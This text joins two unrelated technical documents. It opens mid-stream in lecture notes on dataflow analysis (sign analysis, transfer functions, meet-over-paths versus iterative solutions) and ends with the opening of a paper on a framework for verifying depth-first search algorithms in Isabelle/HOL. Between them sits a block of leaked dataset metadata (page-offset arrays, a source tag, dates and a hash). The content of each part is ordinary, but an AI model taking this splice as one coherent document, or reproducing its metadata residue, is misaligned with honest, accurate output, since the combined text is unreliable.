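print({n: sorted(live_in[n]) for n in (0, 1, 2)})  # {0: [], 1: ['a'], 2: ['b']}
```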
## Meaning of Dataflow Results
Concept of **program state** $s$ for control-flow graphs
- **Program point** $n$ where execution is located
(n is node that will execute next)
- Values of variables in program
Each execution generates a trajectory of states:
- $s_0; s_1; \ldots; s_k$, where each $s_i \in S$
- $s_{i+1}$ is generated from $s_i$ by executing the basic block to
  1. update the variable values, and
  2. obtain the new program point $n$
## Relating States to Analysis Result
• Meaning of analysis results is given by an abstraction function $AF: ST \rightarrow P$
• Correctness condition: require that for all states $s$
\[ AF(s) \leq in_n \]
where $n$ is the next statement to execute in state $s$
## Sign Analysis Example
Sign analysis - compute sign of each variable \( v \)
Base Lattice: \( P = \) flat lattice on \( \{-,0,+\} \)
Actual lattice records a value for each variable
- Example element: \([a \rightarrow +, b \rightarrow 0, c \rightarrow -]\)
## Interpretation of Lattice Values
If value of $v$ in lattice is:
- BOT: no information about the sign of $v$
- -: variable $v$ is negative
- 0: variable $v$ is 0
- +: variable $v$ is positive
- TOP: $v$ may be positive or negative or zero
What is the abstraction function $AF$?
- $AF([v_1,\ldots,v_n]) = [\text{sign}(v_1),\ldots,\text{sign}(v_n)]$
- $\text{sign}(v) = \begin{cases}
  0 & \text{if } v = 0 \\
  + & \text{if } v > 0 \\
  - & \text{if } v < 0
  \end{cases}$
### Operation \(\otimes\) on Lattice
<table>
<thead>
<tr>
<th>(\otimes)</th>
<th>BOT</th>
<th>-</th>
<th>0</th>
<th>+</th>
<th>TOP</th>
</tr>
</thead>
<tbody>
<tr>
<td>BOT</td>
<td>BOT</td>
<td>BOT</td>
<td>0</td>
<td>BOT</td>
<td>BOT</td>
</tr>
<tr>
<td>-</td>
<td>BOT</td>
<td>+</td>
<td>0</td>
<td>-</td>
<td>TOP</td>
</tr>
<tr>
<td>0</td>
<td>0</td>
<td>0</td>
<td>0</td>
<td>0</td>
<td>0</td>
</tr>
<tr>
<td>+</td>
<td>BOT</td>
<td>-</td>
<td>0</td>
<td>+</td>
<td>TOP</td>
</tr>
<tr>
<td>TOP</td>
<td>BOT</td>
<td>TOP</td>
<td>0</td>
<td>TOP</td>
<td>TOP</td>
</tr>
</tbody>
</table>
## Transfer Functions
If \( n \) of the form \( v = c \)
- \( f_n(x) = x[v \rightarrow +] \) if \( c \) is positive
- \( f_n(x) = x[v \rightarrow 0] \) if \( c \) is 0
- \( f_n(x) = x[v \rightarrow -] \) if \( c \) is negative
If \( n \) of the form \( v_1 = v_2 \times v_3 \)
- \( f_n(x) = x[v_1 \rightarrow x[v_2] \otimes x[v_3]] \)
I = TOP (uninitialized variables may have any sign)
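The lattice operation and transfer functions can be sketched directly; the encoding below is illustrative (strings for the lattice values), and `otimes` follows the ⊗ table from the previous slide:

```python
# Flat sign lattice values (illustrative encoding).
BOT, NEG, ZERO, POS, TOP = "BOT", "-", "0", "+", "TOP"

def otimes(x, y):
    """Abstract multiplication on the sign lattice (the ⊗ table)."""
    if x == ZERO or y == ZERO:
        return ZERO                 # 0 times anything is 0
    if x == BOT or y == BOT:
        return BOT                  # no information propagates
    if x == TOP or y == TOP:
        return TOP                  # unknown sign stays unknown
    return POS if x == y else NEG   # like signs give +, unlike give -

def sign(c):
    """Abstraction of a concrete constant (part of AF)."""
    return ZERO if c == 0 else (POS if c > 0 else NEG)

# v1 = v2 * v3 on the abstract environment [a -> +, b -> TOP]:
env = {"a": POS, "b": TOP}
env["c"] = otimes(env["a"], env["b"])
print(env["c"])  # TOP
```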
## Sign Analysis Example

\[ a = 1 \]
then, on one branch, \( b = -1 \); on the other, \( b = 1 \); and at the merge point:
\[ c = a \times b \]
## Imprecision In Example
Abstraction Imprecision:
[a→1] abstracted as [a→+]
Control Flow Imprecision:
[b→TOP] summarizes results of all executions.
(In any concrete execution state s, AF(s)[b]≠TOP)
## General Sources of Imprecision
Abstraction Imprecision
- Concrete values (integers) abstracted as lattice values ($-$, $0$, and $+$)
- Lattice values less precise than execution values
- Abstraction function throws away information
Control Flow Imprecision
- One lattice value for all possible control flow paths
- Analysis result has a single lattice value to summarize results of multiple concrete executions
- Join operation $\lor$ moves up in lattice to combine values from different execution paths
- Typically if $x \leq y$, then $x$ is more precise than $y$
## Why Allow Imprecision?
Make analysis tractable
Unbounded sets of values in execution
• Typically abstracted by finite set of lattice values
Execution may visit unbounded set of states
• Abstracted by computing joins of different paths
## Correctness of Solution
Correctness condition:
• \( \forall v \cdot AF(s)[v] \leq in_n[v] \) (n is node, s is state)
• Reflects possibility of imprecision
Proof:
• By induction on the structure of the computation that produces s
## Meet Over Paths* Solution
What solution would be ideal for a forward dataflow problem?
Consider a path \( p = n_0, n_1, \ldots, n_k, n \) to a node \( n \)
(note that for all \( i \), \( n_i \in \text{pred}(n_{i+1}) \))

The solution must take this path into account:

\[
f_p(\bot) = f_{n_k}(f_{n_{k-1}}(\ldots f_{n_1}(f_{n_0}(\bot)) \ldots)) \leq \text{in}_n
\]

So the solution must have the property that

\[
\lor \{ f_p(\bot) \mid p \text{ is a path to } n \} \leq \text{in}_n
\]

and ideally

\[
\lor \{ f_p(\bot) \mid p \text{ is a path to } n \} = \text{in}_n
\]
* Name exists for historical reasons; this is really a join
## Soundness Proof of Analysis Algorithm
Property to prove: For all paths $p$ to $n$, $f_p(\bot) \leq \text{in}_n$
- Proof is by induction on length of $p$
- Uses monotonicity of transfer function
Connections between MOP and worklist solution:
- [Kildall, 1973] The iterative worklist algorithm: (1) converges and (2) computes a MFP (maximum fixed point) solution of the set of equations using the worklist algorithm
- [Kildall, 1973] If $F$ is distributive, $\text{MOP} = \text{MFP}$
\[ \lor\{f_p(\bot) \mid p \text{ is a path to } n\} = \text{in}_n \]
- [Kam & Ullman, 1977] If $F$ is monotone, $\text{MOP} \leq \text{MFP}$
## Lack of Distributivity Example
**Constant Calculator:** Flat Lattice on Integers
Actual lattice records a value for each variable
- Example element: [a→3, b→2, c→5]
**Transfer function:**
- If n of the form v = c, then $f_n(x) = x[v\rightarrow c]$
- If n of the form $v_1 = v_2 + v_3$, $f_n(x) = x[v_1\rightarrow x[v_2] + x[v_3]]$
## Lack of Distributivity Anomaly

One branch executes \( a = 2;\; b = 3 \) and the other \( a = 3;\; b = 2 \), producing
\[ [a \rightarrow 2, b \rightarrow 3] \quad \text{and} \quad [a \rightarrow 3, b \rightarrow 2] \]
which are joined before the statement
\[ c = a + b \]

What is the meet over all paths solution?
- MOP: \( [a \rightarrow \text{TOP}, b \rightarrow \text{TOP}, c \rightarrow 5] \) (the more precise result)
- Iterative (MFP) solution: \( [a \rightarrow \text{TOP}, b \rightarrow \text{TOP}, c \rightarrow \text{TOP}] \)
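The anomaly can be reproduced concretely; this sketch (illustrative, not from the lecture) joins per-variable values on the flat constant lattice, with `TOP` standing for "unknown":

```python
TOP = "TOP"

def join(e1, e2):
    """Pointwise join of two abstract environments on the flat lattice."""
    return {v: (e1[v] if e1[v] == e2[v] else TOP) for v in e1}

def transfer_add(env):
    """Transfer function for c = a + b on the flat lattice."""
    env = dict(env)
    env["c"] = env["a"] + env["b"] if TOP not in (env["a"], env["b"]) else TOP
    return env

path1 = {"a": 2, "b": 3}
path2 = {"a": 3, "b": 2}

# MOP: push each path through the transfer function, then join the results.
mop = join(transfer_add(path1), transfer_add(path2))
# Iterative (MFP) solution: join the inputs first, then apply the function once.
mfp = transfer_add(join(path1, path2))

print(mop["c"], mfp["c"])  # 5 TOP
```

Joining first loses the correlation between `a` and `b`, which is exactly why the MFP result for `c` is `TOP` while the MOP result keeps `5`.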
## Make Analysis Distributive
Keep combinations of values on different paths
\[ \{[a \rightarrow 2, b \rightarrow 3], [a \rightarrow 3, b \rightarrow 2]\} \]
\[ c = a + b \]
\[ \{[a \rightarrow 2, b \rightarrow 3, c \rightarrow 5], [a \rightarrow 3, b \rightarrow 2, c \rightarrow 5]\} \]
## Discussion of the Solution
It basically simulates **all combinations** of values in all executions
- Exponential blowup
- Nontermination because of infinite ascending chains
**Terminating solution:**
- Use widening operator to eliminate blowup (can make it work at granularity of variables)
- However, loses precision in many cases
- Not trivial to select optimal point to do widening
## Look Forward
We will return to these problems later in the semester
• **Interprocedural analysis:** how to handle function calls and global variables in the analysis?
• **Abstract interpretation:** how to automate analysis with infinite chains and rich abstract domains?
Additional readings:
• Short comparison: Wolfgang Woegerer. *A Survey of Static Program Analysis Techniques* (available online)
7706, 26], [7706, 7861, 27], [7861, 8149, 28], [8149, 8307, 29], [8307, 8465, 30], [8465, 8640, 31], [8640, 8800, 32], [8800, 9346, 33], [9346, 9624, 34], [9624, 9969, 35], [9969, 10517, 36], [10517, 10743, 37], [10743, 11122, 38], [11122, 11524, 39], [11524, 11689, 40], [11689, 11882, 41], [11882, 12120, 42], [12120, 12371, 43], [12371, 12774, 44], [12774, 13250, 45], [13250, 13457, 46], [13457, 15631, 47], [15631, 17936, 48], [17936, 19446, 49], [19446, 19734, 50], [19734, 20151, 51], [20151, 20566, 52], [20566, 20900, 53], [20900, 21300, 54], [21300, 21705, 55], [21705, 21942, 56], [21942, 22235, 57], [22235, 22807, 58], [22807, 22937, 59], [22937, 23325, 60], [23325, 23797, 61], [23797, 24059, 62], [24059, 24491, 63], [24491, 25101, 64], [25101, 25591, 65], [25591, 25896, 66], [25896, 26268, 67], [26268, 26449, 68], [26449, 26828, 69], [26828, 27184, 70], [27184, 27471, 71], [27471, 27818, 72], [27818, 27996, 73], [27996, 28523, 74], [28523, 28830, 75], [28830, 28861, 76], [28861, 29405, 77], [29405, 29685, 78], [29685, 30192, 79], [30192, 30943, 80], [30943, 31325, 81], [31325, 32010, 82], [32010, 32696, 83], [32696, 33086, 84], [33086, 33625, 85], [33625, 34087, 86], [34087, 34516, 87], [34516, 35156, 88], [35156, 35713, 89], [35713, 36084, 90], [36084, 36253, 91], [36253, 36762, 92], [36762, 37109, 93], [37109, 37779, 94], [37779, 38260, 95], [38260, 38614, 96], [38614, 39055, 97], [39055, 39318, 98], [39318, 39578, 99], [39578, 40044, 100], [40044, 40370, 101], [40370, 40759, 102], [40759, 40840, 103], [40840, 41038, 104], [41038, 41600, 105], [41600, 41845, 106], [41845, 42082, 107], [42082, 42700, 108], [42700, 43330, 109], [43330, 43664, 110], [43664, 44099, 111], [44099, 44389, 112], [44389, 44778, 113], [44778, 45321, 114]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 45321, 0.01791]]}
|
olmocr_science_pdfs
|
2024-11-30
|
2024-11-30
|
ee3c66974b9f8782f63b70932b2b72ceb8b31062
|
A Framework for Verifying Depth-First Search Algorithms
Peter Lammich René Neumann
Technische Universität München
{lammich,neumannr}@in.tum.de
Abstract
Many graph algorithms are based on depth-first search (DFS). The formalizations of such algorithms typically share many common ideas. In this paper, we summarize these ideas into a framework in Isabelle/HOL.
Building on the Isabelle Refinement Framework, we provide support for a refinement based development of DFS based algorithms, from phrasing and proving correct the abstract algorithm, over choosing an adequate implementation style (e.g., recursive, tail-recursive), to creating an executable algorithm that uses efficient data structures.
As a case study, we verify DFS based algorithms of different complexity, from a simple cyclicity checker, over a safety property model checker, to complex algorithms like nested DFS and Tarjan’s SCC algorithm.
1. Motivation
Algorithms based on depth-first search (DFS) are widespread. They range from simple ones, like cyclicity checking and safety property model checking, to more complicated ones such as nested DFS [3, 6, 16], and Tarjan’s algorithm for computing the set of strongly connected components (SCCs) [17]. In our verified LTL-model checker CAVA [4] we find multiple DFS-algorithms side-by-side: Nested DFS for counter example search, SCC-algorithms for counter example search and optimization of Büchi-automata, and graph search for counter example reconstruction.
Despite their common base, a lot of duplicated effort is involved in formalizing and verifying them, due to their ad hoc formalizations of DFS. The goal of this paper is to provide a framework that supports the algorithm developer in all phases of the (refinement based) development process, from the correctness proof of the abstract algorithm to generation of verified, efficiently executable code. In summary, we want to make the verification of simple DFS-based algorithms almost trivial, and greatly reduce the effort for complex algorithms.
2. Introduction
Depth-first search is one of the basic algorithms of graph theory. It traverses the graph as long as possible (i.e., until there are no more non-visited successors left) along a branch before backtracking. As mentioned in the previous section, it is the base of a multitude of graph and automata algorithms. In this paper, we present a framework in Isabelle/HOL [13] for modeling and verification of DFS based algorithms, including the generation of efficiently executable code.
The framework follows a parametrization approach: We model a general DFS algorithm with extension points. An actual algorithm is defined by specifying functions to hook into those extension points. These hook functions are invoked whenever the control flow reaches the corresponding extension point. The hook functions work on an opaque extension state, which is independent of the state of the base DFS algorithm.
Properties of the algorithm are stated by invariants of the search state. To establish new invariants, one only has to show that they are preserved by the hook functions. Moreover, our framework supports an incremental approach, i.e., upon establishing a new invariant, already established invariants may be assumed. This modularizes the proofs, as it is not necessary to specify one large invariant.
Our framework features a refinement based approach, exploiting the general concepts provided by the Isabelle Refinement Framework [11]. First, an abstract algorithm is specified and proven correct. Next, the abstract algorithm is refined towards an efficient implementation, possibly in many steps. Refinement is done in a correctness preserving way, such that one eventually gets correctness of the implementation. The refinement based approach introduces a separation of concerns: The abstract algorithm may focus on the algorithmic idea, while the refinements focus on how this idea is efficiently implemented. This greatly simplifies the proofs, and makes verification of more complex algorithms manageable in the first place.
On the abstract level, we provide a very detailed base state, containing the search stack, timing information of the nodes, and sets of visited back, cross, and tree edges. On this detailed state, we provide a large library of standard invariants, which are independent of the extension state, and thus can be re-used for all correctness proofs.
For refinement, we distinguish two orthogonal issues: Structural refinement concerns the overall structure of the algorithm. To this end, our framework currently supports recursive and tail-recursive implementations. Data refinement concerns the representation of the state. It allows refining to a concrete state whose content is tailored towards the specific requirements of the parametrization. This includes projecting away parts of the state that are not needed by the actual algorithm, as well as representing the state by efficient data structures. Here, our framework supports some commonly used refinements of the base state, and an integration with the Autoref tool [7]. This tool synthesizes a refined algorithm that uses efficient executable data structures provided by the Isabelle Collections Framework [10], and can be exported to executable code by the code generator of Isabelle/HOL [8].

The framework comes bundled with multiple instantiations, which mostly stem from requirements of the CAVA model checker [4]. We provide implementations for a cyclicity checker, a safety property model checker, the nested DFS variant of [16], and Tarjan's SCC algorithm.

The whole formalization is available online at
http://cava.in.tum.de/CPP15
Structure  The structure of the paper follows roughly the layout from above. We start with an overview of related work in Section 3. In Section 4, we describe the generic framework of the parametrized DFS. After a primer on refinement in Section 5, the proof architecture and library invariants are covered in Section 6. Finally, in Section 7, we attend to the different refinement phases, before concluding the paper in Section 8.
3. Related Work
While depth-first search is a well-known and widespread algorithm, not much work has been done on its formal verification. A very basic stand-alone formalization was done by Nishihara and Minamide [14], where two variants of a basic DFS are given (one with explicit stack, one without) and their equivalence is shown. Furthermore, a couple of basic invariants are proved and code export is possible. But there is neither parametrization (it can solely compute the set of reachable nodes) nor a flexible representation of the graph: it is fixed as a list of pairs.

Another basic approach is given by Pottier [15], where DFS is formalized in Coq to prove correct Kosaraju's algorithm for computing the strongly connected components. This formalization also allows for program extraction, but does not allow easy extension for use in other algorithms.
We described a first approach to a DFS framework in [12], on which this paper is based. The availability of a more advanced refinement framework (cf. Section 5) allows for a cleaner, more general, and more elegant framework. One notable improvement is that the hook functions are now specified in the nondeterminism monad of the refinement framework. This way, the refinement based approach can also be used to develop the hook functions, which was not possible in [12]. Another improvement is the introduction of the most specific invariant (cf. Section 6), as opposed to the notion of DFS-constructable in [12], which allows for an easier process of proving invariants.

In contrast to our development in [9], where we provide a collection of abstract lemmas that help in proving correct similar algorithms, the framework described in this paper is parameterized with hook functions that are invoked at well-defined extension points. This approach is less general, but greatly reduces the effort of instantiating it for new algorithms, as only the functions for the extension points have to be specified, while in [9] the whole algorithm has to be re-written.
4. Generic Framework
In its most well-known formulation, depth-first search is a very simple algorithm: For each node \( v_0 \) from a given set \( V_0 \) of start nodes, we invoke the function DFS. This function, if it has not seen the node yet, recursively invokes itself for each successor of the node.
    discovered = {}
    foreach v0 ∈ V0 do DFS v0

    DFS u:
      if u ∉ discovered then
        discovered = discovered ∪ {u}
        foreach v ∈ E``{u} do DFS v

Note that we use \( E \) for the (fixed) set of edges of the graph and \( R``S \) for the image of a set \( S \) under the relation \( R \) (in particular, \( E``\{u\} \) denotes the set of successors of the node \( u \)).
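Rendered executably, the recursive formulation amounts to only a few lines. The following Python sketch is our own illustration, not part of the formalization; the graph is given as a dictionary `succs` mapping each node to its successor set, standing in for `E``{u}`:

```python
def reachable(succs, V0):
    """Set of nodes reachable from the start nodes V0 (the 'discovered'
    set computed by the simple recursive DFS)."""
    discovered = set()

    def dfs(u):
        if u not in discovered:
            discovered.add(u)
            for v in succs.get(u, ()):  # E``{u}: the successors of u
                dfs(v)

    for v0 in V0:
        dfs(v0)
    return discovered
```

For example, `reachable({1: {2}, 2: {3}, 4: {1}}, {1})` yields `{1, 2, 3}`: node 4 is never discovered because it is not reachable from the start node.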
In this simple form, the algorithm can only be used to compute the set of reachable nodes, i.e., discovered. However, our aim, as laid out before, is to cover DFS based algorithms in general. Therefore we need to develop another view of the algorithm:

1. The algorithm above was given in a recursive form. For a correctness proof, we need to establish invariants for the two foreach-loops, and a pair of pre- and postconditions for the recursive call. This quite complex proof structure impedes the design of our framework. Thus, we use an iterative formulation of DFS that only consists of a single loop. Correctness proofs are done via a single loop invariant.

2. The simple algorithm above only computes a set of discovered nodes. However, in general, one wants to build up a DFS forest with cross and back edges, and discovery and finishing times.

3. To generalize over different DFS-based algorithms, we provide a skeleton DFS algorithm, which is parameterized by hook functions that are called at well-defined extension points and modify an opaque extension state. Moreover, we add an additional break condition, which allows the search to be interrupted prematurely, before all reachable nodes have been explored.
The skeleton algorithm is defined as follows:

    DFS_step:
      if stack = [] then
        choose v0 from V0 ∩ (UNIV − discovered)
        new_root v0; on_new_root v0
      else
        (u, V) = get_pending
        case V of
          None ⇒ finish u; on_finish u
        | Some v ⇒
            if v ∉ discovered then
              discover u v; on_discover u v
            else if v ∈ set stack then
              back_edge u v; on_back_edge u v
            else
              cross_edge u v; on_cross_edge u v

    cond s:
      ¬is_break ∧ (V0 ⊆ discovered ⟶ stack ≠ [])

    DFS:
      init; on_init
      while cond do DFS_step
The step-function has five cases. In each case, we first perform a transformation on the base part of the state (e.g., finish), and then call the associated hook function (e.g., on_finish). Note that hook functions only modify the extension state. We now describe the cases in more detail: If the stack is empty, we choose a start node that has not yet been discovered (the condition guarantees that there is one). The new_root-function pushes this node on the stack and marks it as discovered. Moreover, it declares all outgoing edges as pending.
If the stack is non-empty, the get_pending-function tries to select a pending edge starting at the node \( u \) on top of the stack. If there are no such edges left, the finish-function pops \( u \) off the stack. Otherwise, we have selected a pending edge \((u,v)\). If the node \( v \) has not yet been discovered, the discover-function marks it as discovered, pushes it on the stack, and declares all its outgoing edges as pending. Otherwise, we distinguish whether \( v \) is on the stack, in which case we have encountered a back edge, or not, in which case we have encountered a cross edge. The corresponding basic functions back_edge and cross_edge have no effect on the stack or the set of discovered nodes.
Note that we have not given an explicit definition of any basic function (e.g., finish, get_pending), but only stated behavioral requirements. Similarly, we have not described the exact content of the state, but merely expected it to contain a stack, a set of discovered nodes, and a set of pending edges. We will first initialize this generic algorithm with a very detailed state (cf. Section 6.1) and corresponding operations, and then refine it to more suitable states and operations, based on the requirements of the parameterization (cf. Section 7.1).
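The skeleton with its extension points can be mimicked concretely. The sketch below is our own Python illustration, not the Isabelle formalization: `hooks` maps extension-point names to callbacks that update an opaque extension state `ext`, and `is_break` plays the role of the break condition inside `cond`:

```python
def dfs_skeleton(succs, V0, hooks=None, is_break=lambda ext: False, ext=None):
    """Iterative DFS skeleton: one loop, five cases, hook callbacks.

    succs: dict node -> successor set; V0: set of start nodes.
    hooks may define 'init', 'new_root', 'discover', 'finish',
    'back_edge', 'cross_edge'; each receives (ext, *args) and
    returns the new extension state.
    """
    hooks = hooks or {}
    stack, discovered, pending = [], set(), {}  # pending[u]: unexplored succs

    def call(name, *args):
        nonlocal ext
        if name in hooks:
            ext = hooks[name](ext, *args)

    call('init')
    # cond: ¬is_break ∧ (V0 ⊆ discovered → stack ≠ [])
    while not is_break(ext) and (stack or not V0 <= discovered):
        if not stack:
            v0 = next(v for v in sorted(V0) if v not in discovered)
            stack.append(v0); discovered.add(v0)          # new_root
            pending[v0] = list(succs.get(v0, ()))
            call('new_root', v0)
        else:
            u = stack[-1]
            if not pending[u]:                            # no pending edge
                stack.pop(); call('finish', u)
            else:
                v = pending[u].pop()
                if v not in discovered:                   # tree edge
                    stack.append(v); discovered.add(v)
                    pending[v] = list(succs.get(v, ()))
                    call('discover', u, v)
                elif v in stack:                          # back edge
                    call('back_edge', u, v)
                else:                                     # cross edge
                    call('cross_edge', u, v)
    return discovered, ext
```

For instance, supplying only a `finish` hook that records its argument reproduces the finishing order of the nodes, while leaving all other extension points at their default (skip).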
We now describe two show cases of how to instantiate our framework for useful algorithms:

**Example 4.1.** A simple application of DFS is a cyclicity check, based on the fact that there is a back edge if and only if there is a reachable cycle. The state extension consists of a single flag cyc, which signals that a back edge has been encountered and causes the algorithm to terminate prematurely. The hooks are implemented as follows, where omitted ones default to skip:
    on_init:           cyc = False   (* initially, no cycle has been found *)
    on_back_edge u v:  cyc = True    (* a back edge means a cycle *)
    is_break:          cyc           (* stop as soon as a cycle is found *)
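Specialized this way, the whole checker collapses to a DFS that reports the first back edge. A self-contained Python sketch (our own rendering of Example 4.1; `succs` is a successor-set dictionary):

```python
def has_reachable_cycle(succs, V0):
    """True iff some cycle is reachable from V0, detected as a back edge:
    an edge leading to a node that is still on the DFS stack."""
    discovered, on_stack = set(), set()

    def dfs(u):
        discovered.add(u); on_stack.add(u)
        for v in succs.get(u, ()):
            if v in on_stack:                # back edge: cycle found
                return True
            if v not in discovered and dfs(v):
                return True
        on_stack.discard(u)                  # backtrack: u leaves the stack
        return False

    return any(dfs(v0) for v0 in V0 if v0 not in discovered)
```

Note that a cycle that is not reachable from the start nodes is correctly ignored, e.g. `has_reachable_cycle({1: {2}, 2: {1}}, {3})` is `False`.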
Example 4.2. Another important family of DFS based algorithms is nested depth-first search \([3,6,16]\), which is used in model checkers to find acceptance cycles in Büchi-automata. A nested DFS algorithm consists of two phases, blue and red. The blue phase walks the graph to find accepting nodes. On backtracking from such a node it starts the red phase. This phase tries to find a cycle containing this accepting node – depending on the specific algorithm, it searches for a path to a node on the stack, or to the accepting node. In any case, the red phase does not enter nodes which were already discovered by another red search.
The idea behind the red search is not a concept specific to nested DFS, but of a more general nature: find a non-empty path to a node with a certain property, possibly excluding a set of nodes. The latter set has to be closed (i.e., there must be no edges leaving it) and must not contain any node with the property in question. Using our DFS framework, we formalize this algorithm as find_path_excl V0 P X for some set of start nodes V0, some property P, and a set of nodes to exclude X. It returns either a path to a node with property P, or a new exclusion X' = X ∪ E⁺``V0 that is also closed and does not contain a node with property P. Note that we use E⁺ for the transitive closure of E.
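Under the assumptions just stated (the exclusion is closed and contains no node with the property), such a primitive can be sketched as follows. The code is our illustration of the idea, not the formalized function; it returns either `('path', p)` with a non-empty path to a node satisfying `P`, or `('excl', X2)` with the enlarged closed exclusion:

```python
def find_path_excl(succs, V0, P, X):
    """Either ('path', p): a non-empty path from V0 to a P-node that never
    enters X, or ('excl', X2): the enlarged closed exclusion X ∪ E⁺``V0,
    which still contains no P-node.
    Precondition: X is closed and disjoint from V0."""
    assert all(v not in X for v in V0)
    visited = set()   # nodes entered via a non-empty path, outside X

    def dfs(u, path):
        for v in succs.get(u, ()):
            if v in X or v in visited:
                continue
            if P(v):
                return path + [v]            # non-empty path to a P-node
            visited.add(v)
            p = dfs(v, path + [v])
            if p is not None:
                return p
        return None

    for v0 in V0:
        p = dfs(v0, [v0])
        if p is not None:
            return ('path', p)
    return ('excl', X | visited)
```

Since `X` is closed, every node reachable from `V0` by a non-empty path is either in `X` or ends up in `visited`, so the returned exclusion is closed again; and because any node satisfying `P` would have triggered the path case, the new exclusion contains no `P`-node.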
For the following description of the nested DFS formalization, we assume find_path_excl to be given.
The extension to the state needed for nested DFS consists of two parts: The lasso (i.e., an accepting cycle plus a reaching path from a start node) and all the nodes visited by red searches. Therefore the obvious hooks are
    on_init:  lasso = None; red = {}
    is_break: lasso ≠ None
The next hook to implement is on_finish, where the red phase (that is, find_path_excl) has to be run. We define the auxiliary function run_red_dfs as follows:

    run_red_dfs u:
      case find_path_excl {u} {x. x ∈ set stack} red of
        Inl X' ⇒ (* no path, but a new exclusion *)
          red = X'
      | Inr p ⇒ (* found a path *)
          lasso = make_lasso p

The hook is then defined as

    on_finish u: if accepting u then run_red_dfs u
For more recent optimizations of nested DFS, like cycle detection on back edges \([16]\), some other hooks have to be instantiated, too.
5. The Isabelle Refinement Framework
In order to formalize algorithms such as depth-first-search, it is advantageous to start with an abstract description of the algorithmic idea, on which the correctness proof can be done in a concise way. The abstract description usually includes nondeterminism and is not executable.
For example, the get_pending-function in our skeleton algorithm (cf. Section 4) does not specify an order in which pending edges are selected, i.e., any pending edge may be chosen nondeterministically. Moreover, the set type used for the successors of a node has no counterpart in common programming languages, e.g., there is no set datatype in Standard ML.
Once the abstract algorithm is proved correct, it is refined towards a fully deterministic, executable version, possibly via multiple refinement steps. Each refinement step is done in a systematic way that guarantees preservation of correctness. For example, one can implement the graph by adjacency lists, and process the pending edges in list order.
The refinement approach simplifies the formalization by separating the correctness proof of the abstract algorithmic ideas from the correctness proof of the concrete implementation. Moreover, it allows to re-use the same abstract correctness proof with different implementations.
In Isabelle, this approach is supported by the Isabelle Refinement and Collections Frameworks \([10,11]\), and the Autoref tool \([7]\). Using ideas of refinement calculus \([1]\), the Isabelle Refinement Framework provides a set of tools to concisely express nondeterministic programs, reason about their correctness, and refine them (in possibly many steps) towards efficient implementations. The Isabelle Collections Framework provides a library of verified efficient data structures for standard types such as sets and maps. Finally, the Autoref tool automates the refinement to efficient implementations, based on user-adjustable heuristics for selecting suitable data structures to implement the abstract types.
In the following, we describe the basics of the Isabelle Refinement Framework. The result of a (possibly nondeterministic) algorithm is described as a set of possible values, plus a special result FAIL that characterizes a failing assertion.
    datatype 'a nres = RES "'a set" | FAIL
On results, we define an ordering by lifting the subset ordering, FAIL being the greatest element.
    RES X ≤ RES Y ⟷ X ⊆ Y
    m ≤ FAIL
Note that this ordering forms a complete lattice, where RES \{\} is the bottom and FAIL is the top element. The intuitive meaning of \( m \leq m' \) is that all possible values of \( m \) are also possible for \( m' \). We say that \( m \) refines \( m' \). In order to describe that all values in \( m \) satisfy a condition \( \Phi \), we write \( m \leq \text{spec } x.\ \Phi\ x \) (or shorter: \( m \leq \text{spec } \Phi \)), where \( \text{spec } x.\ \Phi\ x \equiv \text{RES } \{ x.\ \Phi\ x \} \).
**Example 5.1.** Let \( \text{cyc_checker } E \ V0 \) be an algorithm that checks a graph over edges \( E \) and start nodes \( V0 \) for cyclicity. Its correctness is described by the following formula: it should return true if and only if the graph contains a cycle reachable from \( V0 \), which is expressed by the predicate cyclic:
\[
\text{cyc_checker } E \ V0 \leq \text{spec } r. \ r = \text{cyclic } E \ V0
\]
Now let \( \text{cyc_checker_impl } \) be an efficient implementation\(^1\) of \( \text{cyc_checker } \). For refinement, we have to prove:
\[
\text{cyc_checker_impl } E \ V0 \leq \text{cyc_checker } E \ V0.
\]
Note that, by transitivity, we also get that the implementation is correct:
\[
\text{cyc_checker_impl } E \ V0 \leq \text{spec } r. \ r = \text{cyclic } E \ V0.
\]
To express nondeterministic algorithms, the Isabelle Refinement Framework uses a monad over nondeterministic results. It is defined by

    return x       ≡ RES {x}
    bind (RES X) f ≡ Sup {f x | x ∈ X}
    bind FAIL f    ≡ FAIL

Intuitively, return \( x \) yields the deterministic outcome \( x \), and bind \( m\ f \) is sequential composition, which describes the result of nondeterministically choosing a value from \( m \) and applying \( f \) to it. In this paper, we write \( x = m;\ f\ x \) instead of \( \text{bind } m\ f \), to make program text more readable.
Recursion is described by a least fixed point, i.e., a function \( F \) with recursion equation \( F\ x = B\ F\ x \) is described by \( \text{lfp } (\lambda F.\ B\ F)\ x \). To increase readability, we write a recursive function definition as \( F\ x = B\ F\ x \). Based on recursion, the Isabelle Refinement Framework provides while and foreach loops. Note that we agree on a partial correctness semantics in this paper\(^2\), i.e., infinite executions do not contribute to the result of a recursion.

Another useful construct is the assertion:

    assert Φ ≡ if Φ then return () else FAIL
An assertion generates an additional proof obligation when proving a program correct. However, when refining the program, the condition of the assertion can be assumed.
**Example 5.2.** The following program removes an arbitrary element from a non-empty set. It returns the element and the new set.
    select s:
      assert s ≠ {};
      x = spec x. x ∈ s;
      return (x, s − {x})
The assertion in the first line expresses the precondition that the set is not empty. If the set is empty, the result of the program is \( \text{FAIL} \). The second line nondeterministically selects an element from the set, and the last line assembles the result: A pair of the element and the new set.
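Modeled finitely in Python (our own sketch), select returns the set of all possible outcomes, and a violated assertion yields the FAIL sentinel; every possible outcome \((x, s')\) satisfies \(x \in s\) and \(s' = s - \{x\}\):

```python
FAIL = object()  # result of a failing assertion

def select(s):
    """All possible outcomes of nondeterministically removing one element
    from the frozenset s; FAIL if the precondition s ≠ {} is violated."""
    if not s:
        return FAIL                          # assert s ≠ {} fails
    return {(x, frozenset(s - {x})) for x in s}
```

Running `select(frozenset({1, 2, 3}))` yields three possible results, one per choice of removed element, while `select(frozenset())` is `FAIL`.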
Using the verification condition generator of the Isabelle Refinement Framework, it is straightforward to prove the following lemma, which states that the program refines the specification of the correct result:
    ∀s. s ≠ {} ⟹ select s ≤ spec (x, s'). x ∈ s ∧ s' = s − {x}
Typically, a refinement also changes the representation of data, e.g., a set of successor nodes may be implemented by a list. Such a data refinement is described by a relation \( R \) between concrete and abstract values. We define a concretization function \( \Downarrow R \) that maps an abstract result to a concrete result:

    ⇓R FAIL    ≡ FAIL
    ⇓R (RES X) ≡ RES {c. ∃a ∈ X. (c, a) ∈ R}

Intuitively, \( \Downarrow R\ m \) contains all concrete values with an abstract counterpart in \( m \).
